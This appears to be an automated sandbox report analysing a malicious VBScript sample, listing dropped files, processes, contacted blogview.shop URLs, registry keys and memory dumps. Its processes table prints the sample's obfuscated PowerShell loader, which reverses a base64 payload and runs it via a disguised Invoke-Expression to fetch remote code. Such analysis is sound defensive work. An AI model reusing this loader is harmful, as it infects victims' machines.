Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
ESOLV6hRQd.vbs
|
ASCII text, with very long lines (1397), with CRLF, LF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxzgrtqr.zij.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruiwkovn.cwm.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ESOLV6hRQd.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code =
'==Qf7kSewJHZkwyJ3g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8yNoNXZyZWZy9iNzgzM0kDMwEDOzUDNwUTO3gDMx8yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c'
;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64))
;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://blogview.shop/api/values/10879504538100943836/refresh7/X
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://blogview.shop/api/values/10879504538100943836/refresh7/
|
unknown
|
||
|
https://blogview.shop/api/values/refresh7
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://blogview.shop/api/values/
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://blogview.shop/api/values/10879504538100943836/refresh7/496578.txt
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://blogview.shop/api/values/refresh7X
|
unknown
|
||
|
https://blogview.shop
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
blogview.shop
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1868186E000
|
trusted library allocation
|
page read and write
|
|
|
|
186FF350000
|
heap
|
page read and write
|
||
|
7FF7C0F00000
|
trusted library allocation
|
page read and write
|
||
|
18699CA0000
|
heap
|
page read and write
|
||
|
18681B7D000
|
trusted library allocation
|
page read and write
|
||
|
186FF3E9000
|
heap
|
page read and write
|
||
|
2C01925C000
|
heap
|
page read and write
|
||
|
186FF46D000
|
heap
|
page read and write
|
||
|
18699C77000
|
heap
|
page execute and read and write
|
||
|
F1007FE000
|
stack
|
page read and write
|
||
|
2C0191DC000
|
heap
|
page read and write
|
||
|
F1004FE000
|
stack
|
page read and write
|
||
|
186814D0000
|
trusted library allocation
|
page read and write
|
||
|
7DF4F0270000
|
trusted library allocation
|
page execute and read and write
|
||
|
584D8CE000
|
stack
|
page read and write
|
||
|
18699DFB000
|
heap
|
page read and write
|
||
|
2C019224000
|
heap
|
page read and write
|
||
|
186814C0000
|
heap
|
page execute and read and write
|
||
|
584C97E000
|
stack
|
page read and write
|
||
|
2C0190C0000
|
heap
|
page read and write
|
||
|
2C0191B0000
|
heap
|
page read and write
|
||
|
2C018FE0000
|
heap
|
page read and write
|
||
|
186833A8000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C3B000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0CD6000
|
trusted library allocation
|
page read and write
|
||
|
2C019200000
|
heap
|
page read and write
|
||
|
18682F86000
|
trusted library allocation
|
page read and write
|
||
|
18699AAF000
|
heap
|
page read and write
|
||
|
18691641000
|
trusted library allocation
|
page read and write
|
||
|
18699B59000
|
heap
|
page read and write
|
||
|
F1000FA000
|
stack
|
page read and write
|
||
|
18699DDF000
|
heap
|
page read and write
|
||
|
186FF655000
|
heap
|
page read and write
|
||
|
7FF7C0C7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
18699B0B000
|
heap
|
page read and write
|
||
|
584C5EE000
|
stack
|
page read and write
|
||
|
7FF7C0EF0000
|
trusted library allocation
|
page read and write
|
||
|
18681A4D000
|
trusted library allocation
|
page read and write
|
||
|
F1009FD000
|
stack
|
page read and write
|
||
|
18699B90000
|
heap
|
page execute and read and write
|
||
|
18681641000
|
trusted library allocation
|
page read and write
|
||
|
2C019224000
|
heap
|
page read and write
|
||
|
18681430000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C40000
|
trusted library allocation
|
page read and write
|
||
|
186FF320000
|
heap
|
page read and write
|
||
|
7FF7C0F40000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0D06000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0E80000
|
trusted library allocation
|
page read and write
|
||
|
186916B4000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0F30000
|
trusted library allocation
|
page read and write
|
||
|
584CC7D000
|
stack
|
page read and write
|
||
|
584CB7F000
|
stack
|
page read and write
|
||
|
7FF7C0E02000
|
trusted library allocation
|
page read and write
|
||
|
186FF469000
|
heap
|
page read and write
|
||
|
18699B60000
|
heap
|
page read and write
|
||
|
186FF3E0000
|
heap
|
page read and write
|
||
|
1868304F000
|
trusted library allocation
|
page read and write
|
||
|
2C019205000
|
heap
|
page read and write
|
||
|
7FF7C0DD1000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0F80000
|
trusted library allocation
|
page read and write
|
||
|
18699C70000
|
heap
|
page execute and read and write
|
||
|
7FF7C0E50000
|
trusted library allocation
|
page read and write
|
||
|
18699A96000
|
heap
|
page read and write
|
||
|
7FF7C0F20000
|
trusted library allocation
|
page read and write
|
||
|
584C8FD000
|
stack
|
page read and write
|
||
|
2C0191E6000
|
heap
|
page read and write
|
||
|
F100BFF000
|
stack
|
page read and write
|
||
|
18699B08000
|
heap
|
page read and write
|
||
|
186FF440000
|
heap
|
page read and write
|
||
|
7FF7C0CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
18681470000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0E40000
|
trusted library allocation
|
page read and write
|
||
|
2C01925B000
|
heap
|
page read and write
|
||
|
7FF7C0E30000
|
trusted library allocation
|
page read and write
|
||
|
186FFB36000
|
heap
|
page read and write
|
||
|
18681450000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E20000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0EC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0DC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E70000
|
trusted library allocation
|
page read and write
|
||
|
18682FD8000
|
trusted library allocation
|
page read and write
|
||
|
2C01AFA0000
|
heap
|
page read and write
|
||
|
1868257D000
|
trusted library allocation
|
page read and write
|
||
|
186917F7000
|
trusted library allocation
|
page read and write
|
||
|
584C9FE000
|
stack
|
page read and write
|
||
|
18699B6C000
|
heap
|
page read and write
|
||
|
1869A150000
|
heap
|
page read and write
|
||
|
186FF422000
|
heap
|
page read and write
|
||
|
2C0191DF000
|
heap
|
page read and write
|
||
|
18699A90000
|
heap
|
page read and write
|
||
|
18682F7E000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0CDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C01923C000
|
heap
|
page read and write
|
||
|
1869192E000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0F90000
|
trusted library allocation
|
page read and write
|
||
|
584C52E000
|
stack
|
page read and write
|
||
|
7FF7C0C22000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
584CDFE000
|
stack
|
page read and write
|
||
|
2C019208000
|
heap
|
page read and write
|
||
|
584CCFE000
|
stack
|
page read and write
|
||
|
18681460000
|
heap
|
page readonly
|
||
|
584CA7E000
|
stack
|
page read and write
|
||
|
186FF426000
|
heap
|
page read and write
|
||
|
7FF7C0EA0000
|
trusted library allocation
|
page read and write
|
||
|
186FF41F000
|
heap
|
page read and write
|
||
|
7FF7C0C23000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C01AB60000
|
heap
|
page read and write
|
||
|
18681630000
|
heap
|
page read and write
|
||
|
18699B31000
|
heap
|
page read and write
|
||
|
1868319B000
|
trusted library allocation
|
page read and write
|
||
|
1869164F000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0DDA000
|
trusted library allocation
|
page read and write
|
||
|
584CBFF000
|
stack
|
page read and write
|
||
|
7FF7C0F70000
|
trusted library allocation
|
page read and write
|
||
|
2C01923C000
|
heap
|
page read and write
|
||
|
2C01924C000
|
heap
|
page read and write
|
||
|
7FF7C0E90000
|
trusted library allocation
|
page read and write
|
||
|
186831A4000
|
trusted library allocation
|
page read and write
|
||
|
F100CFB000
|
stack
|
page read and write
|
||
|
186816C6000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0ED0000
|
trusted library allocation
|
page read and write
|
||
|
584CE7E000
|
stack
|
page read and write
|
||
|
18681AB3000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1868304A000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
18699B80000
|
heap
|
page read and write
|
||
|
7FF7C0DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
584C4A3000
|
stack
|
page read and write
|
||
|
2C0190E0000
|
heap
|
page read and write
|
||
|
7FF7C0C24000
|
trusted library allocation
|
page read and write
|
||
|
2C019204000
|
heap
|
page read and write
|
||
|
18681500000
|
trusted library allocation
|
page read and write
|
||
|
186FF42A000
|
heap
|
page read and write
|
||
|
584C87E000
|
stack
|
page read and write
|
||
|
7FF7C0C30000
|
trusted library allocation
|
page read and write
|
||
|
2C019201000
|
heap
|
page read and write
|
||
|
18699B0D000
|
heap
|
page read and write
|
||
|
2C019475000
|
heap
|
page read and write
|
||
|
2C01924B000
|
heap
|
page read and write
|
||
|
584CD7E000
|
stack
|
page read and write
|
||
|
18699DF7000
|
heap
|
page read and write
|
||
|
F100AFE000
|
stack
|
page read and write
|
||
|
18699645000
|
heap
|
page read and write
|
||
|
F1001FE000
|
stack
|
page read and write
|
||
|
2C019202000
|
heap
|
page read and write
|
||
|
7FF7C0F10000
|
trusted library allocation
|
page read and write
|
||
|
1868313E000
|
trusted library allocation
|
page read and write
|
||
|
18699D80000
|
heap
|
page read and write
|
||
|
7FF7C0EB0000
|
trusted library allocation
|
page read and write
|
||
|
F1006FE000
|
stack
|
page read and write
|
||
|
2C0191E5000
|
heap
|
page read and write
|
||
|
186FF390000
|
heap
|
page read and write
|
||
|
18683236000
|
trusted library allocation
|
page read and write
|
||
|
18699ACC000
|
heap
|
page read and write
|
||
|
2C0191E0000
|
heap
|
page read and write
|
||
|
18681B79000
|
trusted library allocation
|
page read and write
|
||
|
584CEFB000
|
stack
|
page read and write
|
||
|
584C56F000
|
unkown
|
page read and write
|
||
|
186FF650000
|
heap
|
page read and write
|
||
|
7FF7C0E60000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0F50000
|
trusted library allocation
|
page read and write
|
||
|
2C019470000
|
heap
|
page read and write
|
||
|
186FF330000
|
heap
|
page read and write
|
||
|
7FF7C0EE0000
|
trusted library allocation
|
page read and write
|
||
|
584CAFF000
|
stack
|
page read and write
|
||
|
18699B15000
|
heap
|
page read and write
|
||
|
7FF7C0F60000
|
trusted library allocation
|
page read and write
|
||
|
186FFB30000
|
heap
|
page read and write
|
||
|
2C0191B8000
|
heap
|
page read and write
|
||
|
7FF7C0CD0000
|
trusted library allocation
|
page read and write
|
||
|
186FF467000
|
heap
|
page read and write
|
There are 164 hidden memdumps, click here to show them.